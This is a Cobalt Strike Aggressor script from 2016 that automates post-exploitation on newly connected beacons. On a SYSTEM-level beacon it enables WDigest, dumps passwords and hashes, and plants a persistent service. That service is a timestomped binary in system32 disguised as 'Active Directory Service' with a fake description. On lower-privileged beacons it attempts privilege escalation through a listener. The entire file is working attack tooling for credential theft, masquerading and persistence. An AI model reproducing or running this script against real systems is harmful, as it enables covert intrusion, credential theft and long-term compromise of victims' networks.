#################################################
# Created by @jgaudard  :: I don't twitter much 
# Aggressor script for initial_beacon with cobaltstrike
# Created: 29 Sept 2016
# Version 1.0
#################################################

sub persist {
    if (-exists script_resource("adsvc.exe")) {
        binput($1, "service persistence (server) [AD]");
        bcd($1, 'c:\windows\system32');
        bupload($1, script_resource("adsvc.exe"));
        btimestomp($1, "adsvc.exe", "cmd.exe");
        bshell($1, 'sc delete adsvc');
        bshell($1, 'sc create adsvc binPath= "C:\windows\system32\adsvc.exe" start= auto DisplayName= "Active Directory Service"');
        bshell($1, 'sc description adsvc "Provides authentication and policy management for computers joined to domain."');
        bshell($1, 'sc start adsvc');

    }
    else {
        berror($1, "adsvc.exe does not exist");
    }
};

## still working on this
alias listpids {
    $2 = $whatiwant;
    blog($1, "what you want is: $2");
    bps($1, lambda({
        local('$pid $name $entry'); 
        foreach $entry (split("\n", $2)) {
            ($name, $ppid, $pid, $arch) = split("\\s+", $entry);
            println($entry);
            if ($name eq "explorer.exe") {
                blog($1, "explorer is $pid");
            }
            else if ($name eq $whatiwant) {
                blog($1, "you wanted: $pid");
            }
        }
    }
))};

on becaon_initial {
  if("SYSTEM" isin beacon_info($1, "user")) {
    say("user is system");
    bwdigest($1);
    blogonpasswords($1);
    bhashdump($1);
    persist($1);
  }
  else if(" *" isin beacon_info($1, "user")) {
    say("user has admin rights");
    belevate($1, "http_443");   ## http_443 is what I call my listener
    bsleep($1, 300, 30);
  }
  else {
    say("just a regular user, hopefully elevation works");
    belevate($1, "http_443");
    bsleep($1, 300, 30);
  }
}







